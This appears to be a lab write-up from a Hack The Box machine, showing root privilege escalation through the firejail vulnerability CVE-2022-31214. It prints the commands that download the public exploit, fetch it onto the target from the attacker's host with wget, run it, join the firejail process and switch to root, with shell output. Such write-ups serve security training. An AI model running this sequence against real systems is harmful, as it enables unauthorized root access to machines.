InfoSec LAB

Cerberus_Privilege_Escalation_Container

Created: 2 min read

CVE-2022-31214

a vulnerability, which was classified as critical, was found in firejail up to 0.9.68. Affected is an unknown part of the file join.c of the component User Namespace Handler. The manipulation with an unknown input leads to a access control vulnerability. CWE is classifying the issue as CWE-284. The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. This is going to have an impact on confidentiality, integrity, and availability.

Exploit

The author has provided the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ curl -s https://seclists.org/oss-sec/2022/q2/att-188/firejoin_py.bin -o CVE-2022-31214.py

Exploit script has been downloaded to Kali

Exploitation

www-data@icinga:/dev/shm$ wget -q http://10.10.14.4/CVE-2022-31214.py ; chmod 755 /dev/shm/CVE-2022-31214.py

Delivery complete

www-data@icinga:/dev/shm$ ./CVE-2022-31214.py
You can now run 'firejail --join=20928' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Executing the exploit script starts a malicious service; PID 20928 I’m supposed to join it from another session and switch to the root user

www-data@icinga:/dev/shm$ ps 20928
    PID TTY      STAT   TIME COMMAND
  20928 pts/2    s+     0:00 /usr/bin/python3 /dev/shm/./CVE-2022-31214.py

That’s the exploit service

www-data@icinga:/dev/shm$ /usr/bin/firejail --join=20928
changing root to /proc/20928/root
warning: cleaning all supplementary groups
Child process initialized in 14.58 ms

Joined Now switching to the root user

www-data@icinga:/dev/shm$ su root
root@icinga:/dev/shm#
root@icinga:/dev/shm# whoami
root
root@icinga:/dev/shm# hostname
icinga
root@icinga:/dev/shm# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.22.2  netmask 255.255.255.240  broadcast 172.16.22.15
        inet6 fe80::215:5dff:fe5f:e801  prefixlen 64  scopeid 0x20<link>
        ether 00:15:5d:5f:e8:01  txqueuelen 1000  (Ethernet)
        RX packets 244184  bytes 36863164 (36.8 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 309821  bytes 51185436 (51.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 22176  bytes 1707434 (1.7 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22176  bytes 1707434 (1.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks